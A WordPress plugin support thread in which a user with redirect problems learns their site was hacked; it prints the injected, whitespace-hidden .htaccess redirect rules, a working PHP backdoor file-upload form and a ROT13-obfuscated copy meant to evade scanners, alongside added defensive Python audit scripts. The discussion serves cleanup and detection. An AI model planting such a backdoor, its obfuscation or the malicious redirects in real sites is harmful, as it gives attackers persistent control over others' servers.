Viewing 9 replies - 1 through 9 (of 9 total)
  • Plugin Author AITpro

    (@aitpro)

    I need more details about what the issue is.

    What exactly do you mean by your statement below? Please explain with specific examples.

    …no matter what address I typed in the browser, any browser, I just saw in a flash the address desired and immediately after I was redirected to my browser homepage (google search)….

    What type of Hosting do you have? Linux or Windows or some other type of hosting?

    Thread Starter chicchera

    (@chicchera)

    Hi, thanks for the prompt reply,

    What happened was that I was locked out of the site: whenever I tried to access a page, or the front page, from a bookmark, say, I could see for an instant the requested address but then it disappeared and I landed on my browser home page (google.com), and that regardless of the browser or machine I was using.

    I solved the problem uninstalling everything (this is a new project I am working on) and reinstalled WordPress and all the plugins but BulletProof security. Now it works. Pity though…

    Plugin Author AITpro

    (@aitpro)

    Oh ok this sounds like the Broken cPanel HotLink Protection Tool problem. Please see this thread >>> https://www.ads-software.com/support/topic/plugin-bulletproof-security-broken-cpanel-hotlink-tool-404-errors-unable-to-edit-htaccess-files?replies=6

    Plugin Author AITpro

    (@aitpro)

    Did you check for the broken cPanel hotlink protection tool problem? Is this problem resolved? Or did you decide to just not install BPS? Please resolve this thread if the problem is resolved. Thanks.

    Thread Starter chicchera

    (@chicchera)

    Sorry, not yet as I was travelling. I’ll have a look later in the evening.

    Thread Starter chicchera

    (@chicchera)

    Anyway, I had a quick look at the link, but my .htaccess now looks like this, and I say now because a few days ago all my .htaccess had a lot of redirections, and no matter which permissions I set to the file they are changed in a few minutes to 644 and all the non-WordPress stuff reappears. This happened after my provider (HostMonster) notified me that there had been an injection of some sort and that they had automatically corrected the file and would continue to do so ??
    It is difficult to read because I have left the original formatting, in case that is of any help.

    <IfModule mod_rewrite.c>
    																														RewriteEngine On
    																														RewriteCond %{HTTP_REFERER} ^.*(ladyluck)\.(.*)
    																														RewriteRule ^(.*)$ https://ya.ru [R=301,L]
    																														</IfModule>																														
    
    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>
    
    # END WordPress
    
    																														ErrorDocument 500 https://ya.ru

    and some 50 empty lines after the last one
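The file posted above shows three things worth checking for in any .htaccess: a rewrite or ErrorDocument pointing at a host that is not yours, a rule conditioned on the Referer header, and directives pushed far to the right so they sit off-screen in an editor. The following is an added example, not part of the original thread or of BPS; the function name, the `own_hosts` parameter, the indentation threshold and the abridged sample are assumptions made for illustration.

```python
import re
from urllib.parse import urlparse

URL = re.compile(r"https?://[^\s\"']+", re.I)
DIRECTIVE = re.compile(r"^\s*(RewriteRule|RewriteCond|Redirect\w*|ErrorDocument)\b", re.I)

def audit_htaccess(text, own_hosts, max_indent=8):
    """Return (line_no, reason, line) findings for one .htaccess file."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = DIRECTIVE.match(line)
        if m:
            name = m.group(1).lower()
            for url in URL.findall(line):
                host = (urlparse(url).hostname or "").lower()
                if host not in own_hosts:
                    findings.append((no, f"{name} targets external host {host}", line))
            if name == "rewritecond" and "%{http_referer}" in line.lower():
                findings.append((no, "rewrite conditioned on Referer (review)", line))
        indent = len(raw) - len(raw.lstrip())
        if indent > max_indent:
            findings.append((no, f"line pushed {indent} columns right", line))
    return findings

PAD = "\t" * 30  # constructed stand-in for the deep indentation in the posted file
SAMPLE = "\n".join([  # constructed, abridged from the file quoted above
    "<IfModule mod_rewrite.c>",
    PAD + "RewriteEngine On",
    PAD + r"RewriteCond %{HTTP_REFERER} ^.*(ladyluck)\.(.*)",
    PAD + "RewriteRule ^(.*)$ https://ya.ru [R=301,L]",
    PAD + "</IfModule>",
    "# BEGIN WordPress",
    "RewriteEngine On",
    "RewriteBase /",
    r"RewriteRule ^index\.php$ - [L]",
    "RewriteCond %{REQUEST_FILENAME} !-f",
    "RewriteRule . /index.php [L]",
    "# END WordPress",
    PAD + "ErrorDocument 500 https://ya.ru",
])

if __name__ == "__main__":
    for finding in audit_htaccess(SAMPLE, own_hosts={"example.com"}):
        print(finding)
```

A Referer condition is also how ordinary hotlink protection is written, so that finding is a prompt to read the rule, not a verdict.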

    Plugin Author AITpro

    (@aitpro)

    Ah ok, now I see what the problem is. Your website was already hacked before you installed BPS.

    BPS does not automatically clean up a hacked website. You can try using a scanning plugin to find and clean the site, but scanning plugins are only capable of finding some and not all of the hacker’s files. They will not detect hacker’s backdoor scripts.

    So the best thing to do would be to restore your website from a good backup or backup your entire website and database and then delete your entire site and database and install everything brand new and then import ONLY your database content tables.

    A hacker’s very simple backdoor uploader – just a simple upload form. A scanning plugin will not find this code and the hacker will just upload his/her files again to your website.

    if (isset($_POST['booger'])) {
    $tmp_file = $_FILES['blah']['tmp_name'];
    $folder_path = $_SERVER['DOCUMENT_ROOT'].'/';
    $uploaded_file = $_FILES['blah']['name'];
    	if (!empty($_FILES)) {
    	move_uploaded_file($tmp_file, $uploaded_file);
    	}
    }
    
    <form name="Scanners_Dont_See_Me" action="" method="post" enctype="multipart/form-data">
    <input name="blah" type="file" />
    <input type="submit" name="booger" class="button" value="Kitty Cat" />
    </form>

    And for the scanners that look for forms and form processing coding they are easily beaten by using the str_rot13 php function or many other methods to hide the form and form processing coding.

    This is the exact same form processing code as shown above, but it is hidden using str_rot13

    str_rot13('vs (vffrg($_CBFG['."'".obbtre."'".'])) {
    $gzc_svyr = $_SVYRF['."'".oynu."'".']['."'".gzc_anzr."'".'];
    $sbyqre_cngu = $_FREIRE['."'".QBPHZRAG_EBBG."'".']'."."."'"."/'".';
    $hcybnqrq_svyr = $_SVYRF['."'".oynu."'".']['."'".anzr."'".'];
    	vs (!rzcgl($_SVYRF)) {
    	zbir_hcybnqrq_svyr($gzc_svyr, $hcybnqrq_svyr);
    	}
    }');
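The post above turns on the fact that a literal search for `move_uploaded_file` or `$_FILES` finds nothing once the text has been passed through ROT13. The following added example (not from the thread, and not how BPS or any particular scanner works) checks each line both as written and after ROT13 decoding and reports hits for manual review; the token list and the sample lines, built from fragments shown on this page, are assumptions, and other encodings would each need their own decoding pass.

```python
import codecs

# Tokens tied to the upload handler shown above; extend for your own review.
TOKENS = ("move_uploaded_file", "$_files", "multipart/form-data", "str_rot13")

def scan_php(text):
    """Return (line_no, token, form) hits, form being 'plain' or 'rot13'."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        plain = line.lower()
        # ROT13 is its own inverse, so one pass recovers anything hidden with it.
        decoded = codecs.decode(plain, "rot_13")
        for token in TOKENS:
            if token in plain:
                hits.append((no, token, "plain"))
            if token in decoded:
                hits.append((no, token, "rot13"))
    return hits

# Constructed sample: one benign line plus simplified fragments from this page.
SAMPLE = "\n".join([
    "<?php get_header(); ?>",
    "move_uploaded_file($tmp_file, $uploaded_file);",
    "str_rot13('zbir_hcybnqrq_svyr($gzc_svyr, $hcybnqrq_svyr);');",
    "$gzc_svyr = $_SVYRF['oynu']['gzc_anzr'];",
])

if __name__ == "__main__":
    for hit in scan_php(SAMPLE):
        print(hit)
```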

    Thread Starter chicchera

    (@chicchera)

    Thanks a lot. I will have to do a lot of work to check several sites though… well, your help has been invaluable and after I’ve solved the problems I will reinstall BPS

    Plugin Author AITpro

    (@aitpro)

    Yeah, I hate to be the one to tell you the bad news. I’m sorry that your site was hacked. It sucks. ;(

    And yep you want to lock all of your websites down if they are all under the same Hosting account and restore all of them at the same time. And of course change all of your passwords too. Ugh.

  • The topic ‘[Plugin: BulletProof Security] redirected to browser homepage’ is closed to new replies.